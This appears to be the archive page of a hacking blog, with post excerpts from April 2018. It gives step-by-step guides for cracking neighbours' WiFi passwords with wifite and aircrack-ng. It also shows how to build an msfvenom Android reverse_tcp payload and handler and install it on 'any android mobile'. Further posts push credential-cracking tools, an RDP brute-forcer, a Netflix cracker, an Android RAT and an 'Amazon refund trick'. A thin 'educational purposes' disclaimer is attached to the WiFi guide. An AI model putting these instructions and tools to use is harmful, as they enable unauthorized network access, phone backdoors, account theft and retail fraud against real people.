Posts

Showing posts from April, 2018

WiFi hacking (easy method)

WIFITE Wifite is a tool used for capturing, sniffing and cracking the wifi password using the brute force method
Kali Linux is indeed one of the best Linux versions for hacking.Today I will tell you how to crack WiFi passwords in the most easy way:-

Requirements: 

Kali LinuxExternal WiFi adapter is necessary if you are using  Kali Linux in a virtual machine or if you do not have a WiFi card in built
Steps to be followed:


1)Open Kali terminal and type wifite
1.1)If an error pops out about wifite command not found,then type:-
       git clone https://github.com/derv82/wifite.git
2)Leave the machine scanning for some time,searching for the different wifi networks in the range.
3)After the scanning has completed press ctrl+c
4)Choose the WiFi numbers

The software will brute force the password and give it to you;)

NOTE:WIFI HACKING IS ILLEGAL AND WE ARE NOT RESPONSIBLE FOR ANY CRIMES COMMITTED AS WE HAVE POSTED THIS FOR EDUCATIONAL PURPOSES.

Hope you enjoyed,
4YU3H41

How to Crack Wifi Using The Aircrack-ng in kali linux

click here for download pdf

Tutorial: How to Crack WPA/WPA2 Introduction This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial.
WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.
There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques…

Termux Tutorial

Image
Learn Ethical Hacking With Termux Android AppHi there , Now You can use Almost all Useful Hacking Tools, Scripts on Your Android Mobile
There are several apps and Hacking Tools are available For Android Mobile and therefore We can Install Kali Linux On Our Android mobile but it requires some time and patient if you are about to use only the tools you needed  then read this article completely to Learn How to Use Termux App and How To Install hacking Tools On Your Android mobile

Termux is a Powerful app  Which can be used to Install useful packages, Hacking Tools On your Android


Now In this Post we are describing About Termux Android App and How To Install Useful Packages/Hacking Tools On your Android mobile

About Termux App
Termux is a Powerful Android app which is Designed to Install Linux packages on your Android Mobile

With this Termux App You Can Install shell, python, c, c++, perl, ruby, java and many more useful packages and with the help of Termux we can use several Ha…

Signalling System 7

Image
SS7 to SIP: how does it work Will help different elements of the telephone network exchange information with each other SS7 is architecture for performing out-band signaling in support of the creation of call billing, routing information exchange functions of the PSTN (public switched telephone network).  SS7 is what functions are executed common channel signaling network, as well as what protocols tedious for its successful execution.
How does SS7 signaling? Alarm – this is the exchange of information between the components call, which provide support and telephony services.
When a PSTN, an exchange of signals with the network elements. This may be done as a set of numbers, to provide an answer station access to the voice channel, to send tone “call waiting”, include automatic redial etc.
Alarm SS7 – a method that will help different elements of the telephone network exchange information with each other. The transfer of information takes place in the form of messages. For e…

Biggest Hack Pack Get it Free

Sentry Mba Full Guide (How To Use It For Cracking)
 πŸ‘‡πŸ‘‡
click here

Netflix Cracker Virus Free
 πŸ‘‡πŸ‘‡
click here

Dubrute (Rdp Cracker)
  πŸ‘‡πŸ‘‡
click here

Amazon Refund Trick(2018)
πŸ‘‡πŸ‘‡
click here
AndroRat (Hack Android Mobile)
                                                                            πŸ‘‡πŸ‘‡
click here

How To Use Wire Shark

Image

About kali linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni, Devon Kearns and RaphaΓ«l Hertzog are the core developers Development Kali Linux has over 600 preinstalled penetration-testing programs, including Armitage (a graphical cyber attack management tool), Nmap (a port scanner), Wireshark (a packet analyzer), John the Ripperpassword cracker, Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAPweb application security scanners.[4][5] Kali Linux can run natively when installed on a computer's hard disk, can be booted from a live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit Framework, a tool for developing and executing security exploits.
It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their…

How To Make Payload In The Termux (andriod)

Hey hi, Many of you said to write a pdf about how to make a pay load in termux so i decided to write this one.
 Enough talk let' s do it All we need is
 1: termux
 2: metasploit should be installed
 3: make sure you have given the permission to sdcard
1 st step: "msfconsole" wait for few minutes
2 nd step: " msfvenom -p android/meterpreter/reverse_tcp LHOST=yourip LPORT=4444R> /sdcard/payload.apk"(now wait for the payload to generate.)
 Now install the payload in any andriod mobile
3 rd step: use exploit/multi/handler
4thstep: show options you will see Module options(exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Exploit target: Id Name -- ---- 0 Wildcard Target
5th step: "set payload android/meterpreter/reverse_tcp"
6th: "set LHOST=yourip"
7th: "set LPORT=4444"
8th: type "exploit" and wait for few minutes
9th: help you will see all the commands
Thanks for r…